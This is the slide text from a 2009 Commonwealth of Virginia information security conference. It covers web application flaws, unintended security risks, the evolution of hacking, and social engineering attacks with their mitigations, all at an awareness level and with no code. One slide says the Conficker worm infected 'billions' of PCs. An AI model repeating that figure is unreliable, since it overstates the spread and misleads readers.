First Annual Commonwealth Information Security Conference .

First Annual CommonwealthInformation Security Conference

www.vita.virginia.gov

Agenda• Walter Kucharski

Top 10 Commonwealth Information Security Issues/Opportunities/Concerns/Risks

• John GreenApplication Security: Why Firewalls Aren’t Enough Anymore

• Keynote: Gino MenchiniGovernment IT: The New Expectations and Challenges

• Randy MarchanyUnintended Consequences: Don't Create New Risks

• Eric TaylorIT Seppuku: Why Do We Still Suffer Security Violations

• Bob BasketteSocial Engineering: Building Bridges to Confidential Data

Commonwealth Information Security Conference

November 2, 2009

AGA Top Ten List -- 2009

1. STIMULUS MONEY -- ARRA

2. DATA SECURITY

3. VITA/NORTHROP GRUMMAN

4. ENTERPRISE APPLICATION/DATA EXCHANGE STANDARDS

5. MORE TIMELY FINANCIAL INFORMATION

AUDITOR OF PUBLIC ACCOUNTS

AGA Top Ten List -- 2009

6. ADMINISTRATIVE DUTIES CONSOLIDATION

7. SUCCESSION PLANNING

8. PERFORMANCE MANAGEMENT / MEASURES

9. CONTRACT MANAGEMENT

10. PPEA / PPTA


The FUTURE -- 2009

• Financial statements will need to be completed and issued with 90 days and the single audit within 4 months

• The State needs newer accounting systems and one sole enterprise application will probably not be the answer

• Data security concerns will continue to grow

• There will be increasing e-commerce and data exchange between federal, local and state government

• Information technology infrastructure and systems will become commodities and shared


Concerns

• WHAT IS PRIVACY?

• WHAT IS TRANSPARENCY?


Concerns

• DATA SECURITY -- Employees

• VITA/NORTHROP GRUMMAN

• DATA EXCHANGE STANDARDS

• MORE TIMELY FINANCIAL INFORMATION

• CONSOLIDATING ADMINISTRATIVE DUTIES


Concerns

• ACCOUNTING/ WORKFLOW SYSTEM CONTROLS WILL REPLACE MANUAL CONTROLS

• E-COMMERCE AND DATA EXCHANGE BETWEEN FEDERAL, LOCAL AND STATE GOVERNMENT

• SHARED INFORMATION TECHNOLOGY INFRASTRUCTURE AND SYSTEMS AS COMMODITIES

AUDITOR OF PUBLIC ACCOUNTS 7

What is an ISO

• Paper pusher or Policeman

• Management Oversight or One of the Gang

• Tail-end Reviewer or System Developer and Guardian

• Risk Manager or Elephant Parade Cleaner


11www.vita.virginia.gov

Application Security:Why Firewalls Are Not Enough

John GreenChief Information Security OfficerCommonwealth of Virginia



Today’s Agenda• Introduction• Lessons From History• Threats and Vulnerabilities• Opportunities For Mitigation• Resources• Questions

Application Vulnerabilities Skyrocketing!

Web vulnerabilities have increased from 1.9% of all published vulnerabilities in 2006 to over 52% in 2009.

Application vulnerabilities from 2007 to 2008 increased by 154%.

WhiteHat Security said about 70% of websites it scans are likely to have at least one critical website vulnerability.

www.vita.virginia.gov Source: http://www.ncircle.com/index.php?s=solution_Web-Application-Vulnerability-Statistics

Largest Breaches In History



Why? Money!

=


Firewall Are No Longer Enough• Firewalls have been around a while

• Primary purpose: To stop unwanted traffic from crossing network boundaries

• Hackers are walking right through them

• Perimeter firewalls are necessary, but no longer sufficient!

• History shows us why


Impenetrable Defenses Of France

"We could hardly dream of building a kind of Great Wall of France, which would in any case be far too costly. Instead we have foreseen powerful but flexible means of organizing defense, based on the dual principle of taking full advantage of the terrain and establishing a continuous line of fire everywhere."— Maginot


21st Century Maginot Line

Email

Web

Router Router

Internal Networks

Maginot Line: Term used now for something that is confidently relied upon but ends up being ineffective.


May 10, 1940 - What Went Wrong?

• Defenses based on past threat– Perimeter protection– No layered defenses

• Holes– Ardennes Forest– Belgium was an ally

• Maginot Line never fell– Bypassed– Surrendered

Firewalls Do Not Stop Today’s Threat


Email

Web

Router Router

DB Server DB Server

Internal Networks

2008 Symantec Threat Report• 63 percent of vulnerabilities affected Web

applications, an increase from 59 percent in 2007

• There were 12,885 site-specific cross-site scripting vulnerabilities identified, compared to17,697 in 2007; of the vulnerabilities identified in 2008, only 3 percent (394 vulnerabilities) had been fixed at the time of writing.

• The education sector represented the highest number of known data breaches that could lead to identity theft, accounting for 27 percent of the total

• The government sector ranked second and accounted for 20 percent of data breaches that could lead to identity theft.

• Hacking ranked second for identities exposed in 2008, with 22 percent; this is a large decrease from 2007, when hacking accounted for 62 percent of total identities exposed.

www.vita.virginia.gov Source: http://www.symantec.com/business/theme.jsp?themeid=threatreport

OWASP Top 10 Application Flaws


Cross Site Scripting (XSS) XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

Injection Flaws Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.

Malicious File Execution Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.

Insecure Direct Object Reference A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.

Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.

Information Leakage and Improper Error Handling

Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.

Broken Authentication and Session Management

Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.

Insecure Cryptographic Storage Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes.

Insecure Communications Applications frequently fail to encrypt network traffic when it is necessary

Failure to Restrict URL Access Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.

Source: http://www.owasp.org/index.php/Top_10_2007

WASC Application Vulnerability Statistics

www.vita.virginia.gov Source: http://projects.webappsec.org/Web-Application-Security-Statistics

Web Application Security Consortium (WASC ) Report 2008 includes data from 12186 web applications evaluated.

Compared to 2007, the number of sites with wide spread SQL Injection and Cross-site Scripting vulnerabilities fell by 13% and 20%, respectively, however, the number of sites with different types of Information Leakage rose by 24%.

On the other hand, the probability to compromise a host automatically rose from 7 to 13 %.


SQL-injection Information• Can occur whenever client-side data is used to construct an SQL

query without first adequately constraining or sanitizing the client-side input. The use of dynamic SQL statements (the formation of SQL queries from several strings of information) can provide the conditions needed to exploit the backend database that supports the web server.

• SQL injections allow for the execution of SQL code under the privileges of the system ID used to connect to the backend database.

• Malicious code can be inserted into a web form field or the website’s code to make a system execute a command-shell or other arbitrary command.

• In addition to command execution exploitation, this vulnerability may allow a malicious individual to change the content of the back-end database and therefore the information displayed by the website.


Cross-Site Scripting (XSS)• Allows a malicious individual to utilize a website address

that does not belong to the malicious individual for malicious purposes.

• Cross Site Scripting attacks are the result of improper filtering of input obtained from unknown or untrusted sources.

• Cross-Site Scripting attacks occur when a malicious individual utilizes a web application to send malicious code, generally in the form of a browser side script, to an unsuspecting user.

• The parameters entered into a web form is processed by the web application and the correct combination of variables can result in arbitrary command execution.


Cross-Site Scripting (XSS)• The unsuspecting user’s browser has no way to know that

the script should not be trusted, and will execute the script.

• Because the unsuspecting user’s browser believes that the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the unsuspecting user’s browser.

• The injected code then takes advantage of the trust given by the unsuspecting user to the vulnerable site. These attacks are usually targeted to all users of a web application instead of the application itself.

Opportunities For Mitigation• Personnel Awareness & Training• Systems Development Life Cycle• New Development• Application Procurement• Legacy Applications


Systems Development Life Cycle• Project Initiation

• Classify the data that the system will process• Determine if sensitive data absolutely must be collected and/or stored• Perform risk analysis based on known requirements & classification of data• Develop an initial IT System Security Plan

• Project Definition• Identify, document & incorporate security control requirements into IT

System design specifications• Develop evaluation procedures to validate that security controls• Update the IT System Security Plan to include controls

• Implementation• Execute the evaluation procedures• Conduct a risk assessment to evaluate overall system risk• Update the IT System Security Plan to include controls

• Disposition• Require that data retention schedules are adhered to• Require that electronic media is sanitized prior to disposal


New Development• Push security involvement to the front end of development:

– Security Design (for sensitive systems)• Encrypted communication channels• Sensitive information shall not be stored in hidden fields

– Application Development• Application-based authentication shall be performed for access to data that

is not considered publicly accessible• Support inactivity timeouts on user sessions• Data storage must be separated from the application interface• Validate all input irrespective of source, focus on server-side• Implement a default deny policy for access control• Use the least set of privileges required for processing• Internal testing must include one of: penetration testing, fuzz testing or

source code auditing• Clear cached and temporary data upon exit

– Production and Maintenance• Scan internet-facing sensitive applications periodically for vulnerabilities


Applications Procurement• Work to incorporate language into contracts that includes:

– General• Personnel, Security Training, Background Checks• Vulnerabilities, Risks and Threats• Application Development

– Development Environment• Secure coding, Configuration management, Distribution, Disclosure, Evaluation

– Testing• General, Source Code, Vulnerability and Penetration Test• Patches and Updates• Tracking Security Issues

– Delivery Of The Secure Application• Self Certification• No Malicious Code

– Security Acceptance And Maintenance• Acceptance• Investigating Security Issues

www.vita.virginia.gov Source: http://www.sans.org/appseccontract/

Legacy Applications• Periodic application vulnerability scanning• Strong configuration management• If vulnerabilities are identified:

– Each application may have specific challenges– Case by case analysis may reveal options:

• Easy fix• Virtualization• Host based intrusion prevention• Application firewall technology• Third party integration• Other technology


Resources


www.OWASP.org


2009 CWE/SANS Top 25


http://iase.disa.mil/stigs/checklist/


http://trustedsignal.com/secDevChecklist.html


Recommended!

Organizational Resources• Agency Information Security Officer

• Commonwealth Security and Risk Management

• Other Resources?

[email protected]


Conclusions• Largest breaches in history due to application

vulnerabilities• Firewalls are necessary but won’t protect

vulnerable applications• SQL injection and Cross Site Scripting top the lists

of vulnerabilities measured and attacked• Many opportunities to address the problem of

insecure code• Plenty of resources to help, USE THEM!



"Fixed fortifications are monuments to the stupidity of man."

GEN. Patton on “Usefulness of Firewalls”

Questions?

Thank You!

[email protected]


Proprietary | Confidential

DRAFT for Review_v.4

Gino MenchiniManaging Director

IT’S ALL ABOUT SERVICE


The City of New York

• Resident population of over 8 million; daytime population of 10 million

• Over 350,000 City employees, 300,000 retirees• New York City Government includes its 5 counties • The 1 million student school system reports to the Mayor• Annual budget exceeds $59.5 billion dollars

• If New York City was a private sector corporation, it would be in the Top 30 of the Fortune 500 companies

• Over 120 agencies, offices, and organizations make up “The City”


New York City as a Bellwether – Local Government IT on Steroids

• New Breed of Leadership – Significant expansion in the role of IT

• Mayor Michael R. Bloomberg – Business & IT experience

• Younger commissioners, senior staff, and legislators demand more of IT

• Higher expectations on Government from the public

• They demand to perform transactions seamlessly through the Government walk-in, web and call centers

• Public’s perception of the competency of an administration is increasingly shaped by the ease of access/response


The role of IT in Emergency Response and Preparedness

• Focus on Public Safety Technologies • 911 & CAD systems and infrastructure - 311• First Responder Radio infrastructure• Command and Control Communications• Greater Dependence on:

• GIS• Email – Blackberries

• New Technologies • Video Surveillance Systems – Sensor systems• Hospital Emergency Room monitoring systems• AVL• Emergency Management Systems• Real time Crime Center• Intelligent Transportation systems• Access control systems

• Telecomm carrier infrastructure survivability – post 9/11

• Municipal IT infrastructure – Redundancy/Survivability


New York City as a Bellwether – Local Government IT on Steroids

• IT is now at the decision making table – Are we ready?

• Guide and manage a larger volume of IT projects simultaneously while advancing our IT Strategy

• Be prepared to deliver IT projects rapidly – high availability systems

• Provide solutions to address the problem of the day – Be relevant


NYC Department of Information Technology and Telecommunications - Then


The role of the NYC Department of Information Technology and Telecommunications - Now


New technologies – implemented rapidly


New York City’s Agencies and IT

• Highly diverse range of services, unlike private sector.

– Virtually the entire range of Government Public Sector Services are provided by New York City – from Child care to Anti-terrorism, Street cleaning to fresh water reservoirs.

– Agencies are organized and staffed to focus on their area of responsibility and specialization (silos).

– Specialized agency specific IT applications need to be implemented and supported by agencies.

– High availability is required. Security is expected.

Unintended Consequences: Don’t Create New RisksRandy Marchany, VA Tech IT Security Office

What People Think of SecurityWhat People Think of SecurityInternal Network

The Big Bad Internet

The Firewall will protect us!

What I meant is not what I saidWhat I meant is not what I said• Schneier’s article

• http://www.schneier.com/essay-210.html• Google street view• County records• Account lockout – the easy DOS• SSN finders – SSN generators?• Fundrace.org• P2P• Spammers and FOIA• Classroom locks?• Emergency Messaging Systems

http://www.schneier.com/essay-210.html

Inside the Twisted Mind….Inside the Twisted Mind….• Security mindset involves thinking how things

can be made to fail• Otherwise, you never notice most security

problems

• Designers are so focused on making systems work that they don’t notice how they might fail

• They don’t notice how those failures might be exploited

Inside the Twisted Mind…..Inside the Twisted Mind…..• Uncle Milton’s Ant Farm

• You filled out a card with your address and they’d mail you some ants but…..

• They’ll send a tube of live ants to anyone you tell them to

• Smartwater• Liquid with unique id linked to an owner• I’ll paint mine on YOUR stuff and then call the

police

Inside The Twisted Mind…Inside The Twisted Mind…• Auto Dealership Service Centers

• Get my car by giving them my name• Get your car by giving them your name

• Laser Printers• Use their disks for your storage

• City Surveillance• Who watches the watchers?• Can you corrupt stored camera images?

Account LockoutAccount Lockout• What’s the purpose of the lockout?

• Log failed attempts?• Multiple entries in a short period of time

usually indicate a brute force attack

• Password strength rules in effect?• Designed to prevent guessable passwords

Account LockoutAccount Lockout• How long does it take to reset the

account?• Minutes?• Hours?• Forever?• After hours?

• So, what if my attack is to lock you out?

Account LockoutsAccount Lockouts• Account Lockout Policy

• 25+ year defense • Old Unix systems had no password controls so

this was the only defense against brute force guessing

• AIX 3.1 (~1993) was one of the first with password controls

• Why are we still using a 25 year defense if the other controls are more effective?

SSN Finders or SSN Generators?SSN Finders or SSN Generators?• Software to search for sensitive data on

computers• Can they be used to generate SSN/CCN?

• Freeware• VT – Find_SSNs• Cornell – Spider• UT-Austin – SENF

• Commercial • IdentityFinder

Inside the Twisted Mind…Inside the Twisted Mind…

P2P or P@!@#*($%)PP2P or P@!@#*($%)P• Ban it says the RIAA/MPAA!• Extension divisions use P2P to distribute

videos/recordings to farmers• YouTube• Independent bands use P2P to sell or

distribute their music• Ban P2P…bring on the antitrust lawsuits• You’re restricting my ability to market my product

Spammers and FOIASpammers and FOIA• A known spammer issued a FOIA

request for all U of Texas faculty, staff and student email address

• Same thing happened in VA

Antivirus Software: Threat?Antivirus Software: Threat?• My job is to test security tools

• AV Software deletes my tools because it thinks it knows better than me. • “We know what’s good for you….”

syndrome

• It’s a race to create the exception list

Things That Make You Go Hmmm…Things That Make You Go Hmmm…• Locks on doors

• Bulletproof doors included?• Likelihood of mugging vs. worse

• Dealing with 2 separate incidents• First event happened ~7am• Second event happened ~930am almost ¾ mile

away from the first event

• Insider attack

Approx.2 miles

Yes, it’s aAirport…

CampusLockdown?

Understand Your Audience Understand Your Audience • Security Process without regard to Business

Process• Business Process rule the world• Physical security rules can be translated to

cybersecurity rules• IT people focus on technology not the business

process. Wrong!

• Business process doesn’t consult IT when buying new gadgets

Use Risk Analysis to Build DR PlanUse Risk Analysis to Build DR PlanBusiness Process A

Business Process B Business Process C

Oracle DB Forms Servers Auth Servers

Host A Host B Host C Host D Host E Host F

We have met the enemy and it is vendors…..

It’s Insecure Out of the BoxIt’s Insecure Out of the Box• Viruses will never be eliminated

• Multibillion $ industry to fight them• Eliminate the threat, we no longer have multibillion $ industry.

• Wireless cash register software sending data in the clear

• Document imaging systems sending data in the clear

• Govt/LE records digitized by insecure software

• Printers, copiers based on NT!

It’s Insecure Out of the BoxIt’s Insecure Out of the Box• Security vs. Convenience

• Let the users debug the code• OS vendors are starting to see the

light• Windows XP/2003 with security features

enabled• Apple OSX • Linux systems with firewall enabled

• Application Vendors still don’t get it• Oracle stepped in it

– http://news.com.com/When+security+researcher+become+the+problem/2010-1071_3-5807074.html

http://news.com.com/When+security+researcher+become+the+problem/2010-1071_3-5807074.html



Unlocked KeyMean TransmissionIn the Clear!

Why buy the cow when you can get the milk for free?

Obtaining Personal InformationObtaining Personal Information• Public Records can be accessed from

anywhere in the world.• Local governments are allowing access

to sensitive info via the Web without thinking about security.

County Clerks and Identity Theft County Clerks and Identity Theft

• Making legal docs available on the net w/o good security practices.• A secure www site isn’t enough• Tom Delay SSN From Public Records• Jeb Bush SSN From Public Documents• Colin Powell Deed of Trust• Colin Powell SSN from Public Records

• Do County Clerks (by extension, the state legislature) facilitate ID Theft?

What’s Going On Here?What’s Going On Here?

• We’re spending $$$ to protect sensitive data (SSN) but….

• State govt is allowing SSN info to be obtained online so….

• Laws need to be coordinated but….• Update: VA passed a law (7/1/08) that makes it

illegal to distribute SSN legally obtained from public govt www sites

The Twisted Mind…The Twisted Mind…• If you’re not doing anything illegal, you

shouldn’t care whether you’re “surveilled”

• What if I just want to track you?• NY Times article on bored security staff

tracking people on the streets….

T-Mobile said the company's computer forensics and security team were "actively investigating to determine how Ms. Hilton's information was obtained."

Cell phone voicemail easily hackedThey got Paris Hilton's contacts, and could get yours, tooBy Bob SullivanTechnology correspondentMSNBCUpdated: 3:51 p.m. ET Feb. 28, 2005

"We were shocked by mobile voicemail vulnerability," he said. "This is not about (cell phone) operator bashing. This is about generating attention. They knew this and haven't generated any action." hiltonbook.html

http://www.msnbc.msn.com/

The Twisted Mind…The Twisted Mind…• Smart phones and PDA’s have become

the electronic equivalent of the sticky note• Put my passwords in the device

• What if I drain your battery?

VirtualizationVirtualization• Use it to check for unintended

consequences

• Build test systems then apply Schneier’s rule to them

• Let’s see a demo…..

Should We Give Up?Should We Give Up?• NO! But examine solutions carefully to

make sure you don’t introduce a worse threat

• Knee-jerk solutions cause worse problems

• Apply Schneier’s rules to your solution

Should We Give Up?Should We Give Up?• NO! Hold vendors accountable for their

bad security practices• Insecure code• Stolen developer laptop syndrome• They modify their EULA• We just don’t buy the product….

Should We Give Up?Should We Give Up?• NO! Increase User Awareness training.

• Customize it. What makes sense at VT might not make sense in your house.

• Helps your overall security posture.• If we do security for the end user, they’ll

never change their behavior.• All security is local….

• A Tip O’Neill twist

Questions?Questions?• Randy Marchany, VA Tech IT Security

Office & Lab, 1300 Torgersen Hall, VA Tech, Blacksburg, VA 24060

• 540-231-9523

• [email protected]

• http://security.vt.edu

mailto:[email protected]

http://security.vt.edu/

Eric TaylorEnterprise Security Architect – Northrop Grumman

IntroductionEvolution of computer attacksThe Commonwealth over the last

yearHow Do We Avoid Security Violations

No such thing as a “secure” systemSecurity is hard, but the basics are

easy and still need attention. Attacks are not always technical,

non-technical means can be usedAttacks take the path of least

resistance

Hacking for Fun (1970 – 1995) The goal was to gain access Motivation was mainly curiosity Methods: phreakers, password guessing,

bad configurations, virus, trojan horses, insecure networks.

Lessons Learned New Laws: Congress passes the

Computer Fraud and Abuse Act

Casual Hacking (1995 – 2000) The goal was to gain access, defacement,

disruption. The motivation was for “showing off”, education,

publicity and money. Methods: buffer overflows, email virus/

attachments, AOHell, Back Orifice Lessons Learned

There is a need for compromise detection (intrusion detection)

Software security through better tools and languages

Hacking (2001 – 2005) The goal was to attract attention through

large-scale activities. Motivation publicity and money Methods: DoS, worms, rootkits, etc..

Lessons Learned Service Denied Bill Gates decrees that Microsoft will secure

its products and services, and kicks off a massive internal training and quality control campaign.

Professional hacking (2005 - ?? ) The goal for system compromise, identity

theft, information exfiltration, and Advanced Persistent Threat (APT)

Motivation is $$$ Methods: web attacks, phishing /

pharming, spear-phishing, etc.. ▪ Malware, drive by downloads, FakeAV

Large-scale botnets, hacker “service” networks

Conficker worm infiltrated billions of PCs worldwide

Malware / Worms Over a three month period, 1335 total

unique infections (fakeav and others) Conficker FakeAV

Mobile Devices USB drives

▪ Lost Flash drives▪ Conficker

Stolen or lost Laptops Unsecure configurations

Systems not locked down before production

Information leakage Posting sensitive information to public website Human Error

Application Security According to Privacy Clearing house, one

incident in 2009, Virginia provided individual notifications to 530,000 people

530,000 x $.50 = $265,000 (estimate for stamps and envelopes)

Social Engineering Spear phishing user accounts throughout the

Commonwealth

Malware 66% over the last year Major Outages

Unauthorized Access Attempts 3 instances of Virginia Agencies in 2009

appear on the Privacy Clearing House - “A Chronology of Data Breaches” website.

Charlie 16 to dispatch, we are currently 10-8 at the Stop and Rob on 2400 block of Jeff Davis.

Firewall

Firewall

Application Logic

Application Logic

Access ControlAccess Control

DATADATA

HTTP/ HTTPS

Developer

Developer

Firewall

Firewall

Application Logic

Application Logic

DATADATA

Access ControlAccess Control

Developer

Developer

Bad GuyBad Guy

Charlie 16 to dispatch, we are currently 10-8 at the Stop and Rob on 2400 block of Jeff Davis.

20 Critical Controls, prioritized baseline of information security measures and controls*

Boundary DefenseAvoiding Insecure Network

DesignsPatch ManagementUser Awareness Least PrivilegeEnd Point or Client Side Security

* NOTE - SANS 20 Critical Security Controls - Version 2.1

Secure SDLC ProcessesSecurity As Weighted Factor

During the Procurement ProcessApplication Security Security Skill Assessment and

Appropriate Training

We are still learning our lessons Attackers are more advanced then

ever beforeSecurity must start from the

beginning The Commonwealth is a target

133

Social Engineering: Building Bridges to Confidential Data

Bob BasketteCISSP-ISSAP, CCNP/CCDP, RHCTCommonwealth Security Architect


Why Information Security Matters• Computer systems have an inherent value to both

the computer system owner and those malicious individuals who seek the data stored on the computer systems and the available processing power the computer systems possess

• Malicious individuals may also be interested in taking over the computer system to store illegal materials or launch attacks that will be traced back to the compromised system instead of the malicious individual

Social Engineering• The use of influence and persuasion to deceive

people for the purpose of obtaining information or persuading a victim to perform some action

• Based on the building of inappropriate trust relationships

• Will target Help Desk personnel, onsite employees, and contractors

• Is one of the most potentially dangerous attacks since it does not directly target technology

Factors in Social Engineering• Desire to be helpful

• Tendency to trust people

• Fear of getting in trouble

• Art of Manipulation (the ability to blend-in)

Social Engineering Behavioral Types• Scarcity

– Belief that an item is in short supply– Commonly used by marketing

• Authority– Based on premise of power

• Liking– Based on the fact that people tend to help

people they like

Social Engineering Behavioral Types• Consistency

– Based on the fact that people like to be consistent

• Social Validation– If one person does it, others will follow

• Reciprocation– One good turn deserves another

Social Engineering Attack Types• Human-based (Person-to-Person)

• Computer-Based (Automated)

Human-based (Person-to-Person)• Uses the following techniques:

– Shoulder surfing– Dumpster diving– Impersonation– Intimidation– Using third-party approval

Human-based (Person-to-Person)• Impersonation (Masquerading)

– Attacker pretends to be someone else– Can impersonate an new employee, valid user, business client,

janitor, delivery person, or mail room person– Attack carries a higher risk since the attacker is inside the

facility perimeter

• Intimidation (Posing as an important user)– Attacker pretends to be an important user– Works on the belief that it is not good to question authority

• Using third person authorization– Attacker convinces the victim that the attacker has approval

from a third party that is an authoritative source– Works on the belief that most people are good and truthful

Human-based (Person-to-Person)• Reverse Social Engineering

– Considered to be the most difficult type of Social Engineering attack

– Requires a tremendous amount of preparation and skill– Act as help-desk or admin staff to request information– Can involve sabotaging the victim’s equipment and then

offering to fix the problem– Can be difficult to execute since the first step requires

the sabotage of a system– Target could be a external utility such as a phone line– Deliver defective equipment and then offer to repair

• Attach business card to toner box or laptop case

Computer-Based (Automated)• Phishing and Spam

• Email attachments

• Fake websites

• Pop-up messages

• Drive-by downloads

• DNS Cache poisoning

• Spoofed SSL-certificates

SPAM and the Flying Circus• Spam is the intentional abuse or misuse of electronic messaging

systems to send unsolicited bulk messages

• SPAM is normally associated with e-mail spam, can be used with other electronic transmission types such as instant messaging, Usenet newsgroups, Web search engines, blogs, mobile phone messaging, Internet forums, and fax transmissions

• SPAM remains economically viable because advertisers have no operating costs beyond the management of their mailing lists, and it is difficult to hold senders accountable for their mass mailings

• Today, SPAM is increasingly sourced from “bot networks“. Many modern worms install a backdoor which allows the spammer access to the computer and use it for malicious purposes

• SPAM email-chains are still very popular promising good fortune if the chain is not broken

Phishing Basics• Phishing campaigns use either email or malicious web sites

to solicit personal information from targeted individuals

• Attackers attempt to replicate the look and format of emails from reputable companies, government agencies, or financial institutions

• The Phishing messages appear to come from popular social networking sites, auction sites, online payment processors or IT Administrators to entice the unsuspecting public to respond

• Phishing campaigns that target specific categories or groups of users are known as Spear Phishing Campaigns

Phishing Basics• People respond without thinking to things that

seem important

• Email subjects lines worded to create anxiety or self-doubt with subject lines such as “Do you trust her/him” or “Is she/he cheating on you” usually entice immediate action

• Email with the subjects such as “Your bank account has been suspended“ or “There is a problem with your bank account” will usually get instant attention and prompt most people to click on the listed URL to determine what has happened

Pop-up messages• Can prompt victim for numerous types of

information

• Can be very successful since the message appears to be a system message referencing loss of access or malicious software detection

• Has been used successfully to install malicious software under the pretense of removing malicious software

Drive-By Downloads• Uses legitimate websites to infect end users

• The legitimate website is compromised by a malicious individual to add hidden frames, malicious URLs, or malicious scripts to the legitimate website

• The user’s browser retrieves the information associated with the malicious URL or script and becomes infected with malicious software

• ClickJacking = Use of hidden frames on web pages to entice the user into clicking on malicious URLs

DNS Cache Poisoning• Uses DNS responses to redirect users to malicious

websites

• Uses multiple techniques to load malicious IP-address information into legitimate DNS servers

• Removes the need to trick a user into visiting a malicious website since the malicious IP-address is provided by a legitimate DNS server

SSL Certificate Spoofing• MD5 Hash Collision/Digital Signature transfer

– A vulnerability in the Internet Public Key Infrastructure (PKI) used to issue digital certificates for secure websites has been identified

– Utilizes a weakness in the MD5 cryptographic hash function to allow the construction of different messages with the same MD5 hash

– This vulnerability can be used to create a rogue Certification Authority (CA) certificate trusted by all common web browsers

– This rogue certificate can be used to impersonate any website on the Internet, including banking and e-commerce sites secured using the HTTPS protocol

SSL Certificate Spoofing/Piggybacking• “Piggybacking” SSL Certificates

– Allows multiple phishing attacks on a single certificate

– A single compromised Web server with a valid SSL certificate can be used to host multiple phishing sites since visitors to the phishing sites erroneously believe that they have a secure connection with original website

– Visitors could only detect the fake SSL certificate if they reviewed the certificate or had access to other visual indicators (secured with an extended validation SSL certificate)

SSL Certificate Spoofing/URL Obfuscation• NULL character attack

– Convinces the end-user that a certificate has been issued to a different domain than the one to which is was actually issued

– The use of NULL characters provides the ability to put up a certificate on what appears to be the exact same domain name as the targeted site

– This technique utilizes a Man-in-the-Middle attack and uses the null-character certificate to create its false certificates as needed

• Leading zero attack– Similar to the NULL Character attack– The certificate will attach an invisible zero to the first

hex character in the certificate

Social Engineering Mitigation Methods• User Security Awareness and Training

• Policies

• Procedures

Security Awareness Training• Increases the understanding of security

and the threat of Social Engineering

• Training should occur during employee enrollment and at regular intervals

• Training could be outsourced to a third-party since many employees consider third-party input to be more important

Email Security Awareness Training• The best mitigation mechanism for SPAM and Phishing emails is

the delete button

• To mitigate the potential threat presented by a spam email campaign, it is recommended that you remind your users to never open attachments or click links contained in unsolicited email messages

• Advise them, if possible, to check with the person who supposedly

sent the email to make sure that it is legitimate prior to opening any attachments

• Scan any attachments at the network perimeter as well as the desktop with anti-virus software before opening the attachment

• Never use the contact information provided on a web site connected directly to the email request

Email Security Awareness Training• Also advise users not to reveal personal or financial

information in an email, and not to respond to email solicitations for this information

• Always examine the URL of a web site. Malicious web sites may look identical to a legitimate site, but the URL may use a variation in spelling or a different domain extension such as .com vs. .net

• An additional step to help mitigate the risk of a phishing campaign is to limit the administrative rights of the local users through the implementation of the Least-Privileged best practice

• Only display functional/group email addresses on public websites to limit the amount of SPAM/Phishing emails sent to individuals

Physical Security Awareness Training• Ensure all visitors are always escorted

– Remind employees not to allow “Piggy-Back” access

– Remind employees not to allow an unknown person to wander the facility

• Never allow a visitor, client, or other persons to simply connect a computer to the internal network without prior approval

Credential Security Awareness Training• Protection of account credentials

– Never give out or share passwords– Use strong passwords for any application requiring a login – Use unique passwords for every application and avoid using

the same password for similar applications– Carefully consider the questions used to verify the user for

automated password resets– Most automated systems use a common set of questions for

password reset and the answers to these questions can be found in public records or on-line

• Place of birth, mother’s maiden name, and school information are available in public records

• Friends, color preference, hobbies, and pet information often found on Social Network sites

• Make of first car can be guessed based on purchasing trends

Identity Security Awareness Training• Protection of Personal Identifiable Information

within Social Networks – Select your screen name carefully – do not include any

information such as your name, age, sex, city, or employer

– Never post anything you would not want to have distributed publicly

– Never post personally identifying information such as: SSN, first and last name, address, driver’s license, telephone number and e-mail address

– When establishing your account, adjust your profile until you are comfortable with the amount of protection provided to maximize your security

Policies• Must clarify information access controls

• Detail rules for setting up accounts

• Define access approval

• Define process for changing passwords

Policies• Define policy for physical destruction of

devices and media– Hard Drives– CD/DVDs

• Define physical control selection and implementation– Locks– Access controls– How visitors are authorized and escorted

Employee Hiring and Termination Policies• Hiring should include background checks,

verifying educational records, and Non-Disclosure Agreements

• Termination should include exit interviews, review of NDA, suspension of network access, and checklist for equipment return

Help Desk Procedures• Used to make sure that there is a standard

procedure for employee verification

• Caller-ID or employee call-back can be used to verify caller

• Can also use Cognitive Passwords– Arcane information that only the user should

know

Password Change Policy• Require strong passwords

– Must not contain any part of account name– Must be at least 8-characters long– Must contain at least three or four:

• Numbers• Uppercase letters• Lowercase letters• Non-alphanumeric symbols

• Require password aging

• Prohibit password reuse

Employee Identification• ID badges give a clear indication of authorized

personnel

• Guests should also wear temporary ID badges

• Guests should be required to sign-in and sign-out

• Anyone without a badge should be questioned and escorted to the proper facility personnel

Privacy Policies• Employees and customers have a certain

expectation with regard to privacy

• The privacy policy should be posted on the public website

Laws and Regulations• 4th Amendment to the Unites States Constitution

• Electronic Communications Privacy Act of 1986– Protects email and voice communications

• HIPPA (Health Insurance Portability and Accountability Act)

• Family Education Rights and Privacy Act– Privacy rights to students over 18

• European Union Privacy Law– Protects personal data

Data Classification Systems• Can help prevent Social Engineering

• Can be used to define what information is most critical

• Can be used to gain end-user compliance

• Governmental Information Classification System– Designed to protect confidentiality of information

• Commercial Information Classification System– Focused on the integrity of information

Governmental Information Classification System• Unclassified

– Information is not sensitive and does not need to be protected– The loss of information would not cause damage

• Confidential – Information is sensitive and the disclosure could result in some

damage– Will require a safeguard against disclosure

• Secret– Information that is classified as secret has a greater important

than confidential data– Disclosure would result in serious damage– May result in loss of significant scientific or technical

development• Top-Secret

– Information that requires the most protection – Disclosure would be catastrophic

